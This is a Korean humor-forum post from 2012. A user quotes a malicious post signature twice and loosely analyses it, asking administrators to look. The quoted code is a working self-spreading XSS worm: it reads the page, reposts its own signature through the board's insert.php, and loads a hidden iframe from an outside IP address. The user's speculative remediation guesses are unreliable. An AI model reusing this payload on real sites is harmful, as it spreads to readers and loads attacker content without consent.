게시판 즐겨찾기
편집
드래그 앤 드롭으로
즐겨찾기 아이콘 위치 수정이 가능합니다.
[재업] 19. 게시물 소스 분석. 관리자가 봐야 할듯?
게시물ID : humordata_1219247짧은주소 복사하기
작성자 : 너만의남자
추천 : 0
조회수 : 164회
댓글수 : 0개
등록시간 : 2012/11/15 17:45:29

<div style="width:1px;filter:glow" onfilterchange="var xmlhttp = new XMLHttpRequest(); ok_click(this); xmlhttp.open('GET', window.location, false); xmlhttp.send(); var tail = xmlhttp.responseText; tail = tail.split('tail'.concat('_layer'))[1]; tail = tail.split('content'.concat('Container'))[0]; xmlhttp.open('POST', 'http://todayhumor.co.kr/board/insert.php', false); xmlhttp.setRequestHeader('Content-type','application/x-www-form-urlencoded'); var se = 'content=..&amp;to_prevent_error_code=X&amp;ta'.concat('b'); se = se.concat('le=humordata&amp;oekaki_url=&amp;h_code=yes&amp;name=z&amp;subject=19.&amp;tail_html=Y&amp;tail='.concat(escape(tail))); xmlhttp.send(se);  var ifra = '&lt;ifra'; var me  = ifra.concat('me width=1 height=1 src=http://1.234.83.71&gt;&lt;/ifra'); var fin = me.concat('me&gt;'); document.getElementById('topmenu_contain').outerHTML= fin;">x</div>


이란 내용의 꼬릿말이 문제인듯 합니다. 
 보기 편하게

<div style="

width:1px;

filter:glow" onfilterchange="var xmlhttp = new XMLHttpRequest();

 ok_click(this);

xmlhttp.open('GET', window.location, false); 

xmlhttp.send();

     var tail = xmlhttp.responseText; tail = tail.split('tail'.concat('_layer'))[1];

     tail = tail.split('content'.concat('Container'))[0]; 

     xmlhttp.open('POST', 'http://todayhumor.co.kr/board/insert.php', false);

     xmlhttp.setRequestHeader('Content-type','application/x-www-form-urlencoded');


     var se = 'content=..&amp;to_prevent_error_code=X&amp;ta'.concat('b'); se = se.concat('le=humordata&amp;


oekaki_url=&amp;h_code=yes&amp;name=z&amp;

subject=19.&amp;

tail_html=Y&amp;tail='.concat(escape(tail)));

xmlhttp.send(se);

var ifra = '&lt;ifra'; 

var me  = ifra.concat('me width=1 height=1 src=http://1.234.83.71&gt;&lt;/ifra');


var fin = me.concat('me&gt;');

     document.getElementById('topmenu_contain').outerHTML= fin;

">x</div>




코드는 잘모르겠고 GET 부분이랑, POST 부분 마지막으로 me (var me) 가 이렇게 만드는듯. 

get으로 권한 가지고 오고 POST로 올리고 me가 올릴 소스 ( 꼬릿말) 인듯. 


+ 추가

MySQL 로 호스팅 하는듯 누가. 해당 소스 올려놓고 퍼가는 형식으로 가는거 같음. 

해결책은 호스팅 부분 을 막던 _list.asp or _list.jsp  쪽 건드르는거니까 board_list 파일명을 대체 하거나 위치를 바꾸면 될듯.

추가로 
꼬릿말
x 위에
"> "> 이건 강제로 꼬릿말 벗어나려는 거 같음. 

x 부분이 해킹 코드 

꼬릿말 보기
전체 추천리스트 보기
새로운 댓글이 없습니다.
새로운 댓글 확인하기
글쓰기
◀뒤로가기
PC버전
맨위로▲
공지 운영 자료창고 청소년보호